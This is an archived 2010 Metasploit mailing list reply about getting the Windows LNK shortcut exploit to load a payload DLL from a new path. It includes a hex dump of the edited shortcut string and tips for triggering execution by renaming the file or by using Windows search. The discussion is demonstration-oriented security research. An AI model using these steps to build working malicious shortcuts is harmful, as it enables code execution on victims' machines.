Metasploit mailing list archives
Re: LNK Exploit Export
From: Florian Roth <Neo.X () web de>
Date: Sun, 25 Jul 2010 18:39:47 +0200
Hey, thanks, I did the following but struggled because it did not work as I expected. I changed the contents of the LNK to the name of my DLL. But that didn't do the trick. I had to use the following string with a trailing space and double point. 00000080 00 00 00 6a 00 00 00 00 00 00 20 00 3a 00 43 00 |...j...... .:.C.| 00000090 3a 00 5c 00 42 00 4e 00 57 00 45 00 6a 00 42 00 |:.\.B.N.W.E.j.B.| 000000a0 63 00 66 00 49 00 71 00 2e 00 64 00 6c 00 6c 00 |c.f.I.q...d.l.l.| 000000b0 00 00 |..| 000000b2 The tricky thing is, that changing this does not seem to make it work. I had to rename the link file to "linkfile.lnk_" in command line and back in EXPLORER to invoke the process defined in my DLL (calc.exe). I suppose that the renaming causes a cache to be renewed and EXPLORER to check the symbol of the link again. Without that it won't envoke the exploit coded in the DLL in my testing environment. Additional information: A second way to invoke the exploiting was to use the windows search and search for a portion of the LNK file name. The listing of the modified LNK file in the search results lead also to an execution. Every method worked only once per session. I had to log off and login again to make it work another time. Hope that helped someone. That way I am able to generate a DLL with a special payload and ship it with my prepared LNK file. Thanks On Sun, 2010-07-25 at 10:30 +0200, Hendrik Baecker wrote:
Am 24.07.10 21:47, schrieb Florian Roth:I noticed that every time I copied the generated DLL and LNK file to a different directory, the exploit does not work anymore. So I suppose that the code is bound to a fixed path where the DLL has to be located.Don't suppose - know! hexdump -C /path/to/your.lnk ^^I'd like to send the exploit to a friend who wants to demonstrate the impact to the rest of the IT staff. Is there a possibility to export the exploit or change the absolute path to the DLL so he is able to put the LNK and DLL to i.e. "C:\" ??I would try to hexedit the lnk to change the voodoo you found by hexdump. Didn't try it myself yet, maybe some more knowledge about LNK file structure / the weak M$ code is needed. I wouldn't say the DLL itself might be a problem - it's just a PE DLL'd payload. Back to your question - I'm not aware of an export function in metasploit. Cherio! _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- Sincerely Saludos cordiales Mit freundlichen Grüßen Florian Roth Tel: +49 06251 - 827 9402 Mobil: +49 175 - 7240 363 Fax: +49 12125 - 11699510 eMail: Florian.Roth () email de _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- LNK Exploit Export Florian Roth (Jul 24)
- Re: LNK Exploit Export Hendrik Baecker (Jul 25)
- Re: LNK Exploit Export Florian Roth (Jul 25)
- Re: LNK Exploit Export Hendrik Baecker (Jul 25)